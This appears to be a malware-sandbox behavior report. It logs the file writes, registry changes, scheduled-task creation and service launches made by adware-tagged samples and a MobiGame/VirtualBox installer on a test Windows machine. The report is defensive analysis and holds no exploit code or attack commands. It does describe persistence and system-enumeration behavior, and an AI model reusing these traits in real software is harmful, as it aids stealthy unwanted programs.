File opened for modification C:\Windows\Installer\MSI49A6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6937.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E71.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI3A6E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB6D1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI744C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA68D.tmp-\VirtualBoxSetup.pdb C:\Windows\system32\net.exe N/A
File opened for modification C:\Windows\Installer\MSIBD17.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI7E19.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI86F5.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIDF7B.tmp-\WixSharp.UI.dll C:\Windows\System32\Conhost.exe N/A
File opened for modification C:\Windows\Installer\MSI76CE.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI7E71.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\Installer\e58bd36.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58bd3b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1948.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9844.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIA68D.tmp-\WixSharp.UI.dll C:\Windows\system32\net.exe N/A
File opened for modification C:\Windows\Installer\MSI744C.tmp-\CustomAction.config C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIA96D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{0CD5AE2D-BB58-4E35-8B5C-AFE9A9189E1A}\app_icon.ico C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = (binary value not preserved in this copy of the report) C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0" C:\Windows\system32\ie4uinit.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0" C:\Windows\system32\ie4uinit.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Internet Explorer\Main\OperationalData = "12" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities C:\Windows\system32\ie4uinit.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Windows\system32\ie4uinit.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\ie4uinit.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC14-11DF-BB8C-A2F1DED72085} C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\ZFRqtr = 00000000010000000000000000000000000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffffe0eb841ed81dda0100000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\MSEdgeHTM_.mhtml = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{FA99DFC7-6AC2-453A-A5E2-5E2AFF4507BD}\Count C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\sc.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids\mhtmlfile = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgId = "MSEdgeHTM" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\UserChoice C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CAA59E3C-4792-41A5-9909-6A6A8D32490E}\Version = "5" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\MUID\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceId = "0018400C2942BED0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\PreferenceMACs\Default\extensions.settings\ampmimodbocknpfehkbdjolnnbongejb = "725D2CE80FABFB10DAB32456304109061A3CEEFDF4F0C995FB5C42E568475573" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\AppXdn5b0j699ka5fqvrr3pgjad0evqarm6d_ms-xbl-3d8b930f = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC14-11DF-BB8C-A2F1DED72085}\Count C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\PreferenceMACs\Default\extensions.settings\jdiccldimpdaibmpdkjnbmckianbfold = "8211D605C42C0E7CA62BE1DD0216CE80B7AD80AB6607B64AA14FD1F99F2505FA" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Version = "5" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018400C2942BED0 = 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 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\AppX4hxtad77fbk3jkkeerkrm0ze94wjf3s9_.html = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\Hash = "Hk6iTfgSClE=" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\PreferenceMACs\Default\software_reporter.prompt_seed = "C51FEA16CA9AC0F91E3DA98361D5F8D55B61F5E3DA5713F8D6B2F5ABBF0C95CC" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018400C2942BED0 = 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 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\metricsid = "7c0003c0-2586-49a0-b056-e063198e17c4" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\metricsid_enableddate = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5CF2480-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4A82B42-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{c39f8f06-f6c2-11e7-aeb4-080027376349} C:\Windows\syswow64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5B37C12-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\ = "Pinned Site Shortcut" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046} C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4AE6912-F6C2-11E7-AEB4-080027376349}\ = "IGuestSession" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C45A3482-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5BAE132-F6C2-11E7-AEB4-080027376349}\ = "IGuestPropertyChangedEvent" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C488A272-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5B87F82-F6C2-11E7-AEB4-080027376349} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\FriendlyTypeName = "@C:\\Windows\\system32\\ieframe.dll,-912" C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5C08D94-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C46D71A0-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5BF22C4-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\CommandId = "IE.File" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\"" C:\Windows\system32\ie4uinit.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4D0F3A6-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4E451BC-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C59E6D04-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4CC036E-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5BAE132-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VirtualBox.Session\ = "Session Class" C:\Windows\syswow64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C3FC5D26-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5B766CE-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4EA71BE-F6C2-11E7-AEB4-080027376349}\TypeLib\Version = "1.3" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C59D712E-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5B83126-F6C2-11E7-AEB4-080027376349}\TypeLib\ = "{C39F7A20-F6C2-11E7-AEB4-080027376349}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.xht\Content Type = "application/xhtml+xml" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\CommandId = "IE.File" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5AFE8D6-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VirtualBox.VirtualBoxClient\CurVer C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C3FE2822-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5CFDDBC-F6C2-11E7-AEB4-080027376349}\TypeLib\ = "{C39F7A20-F6C2-11E7-AEB4-080027376349}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
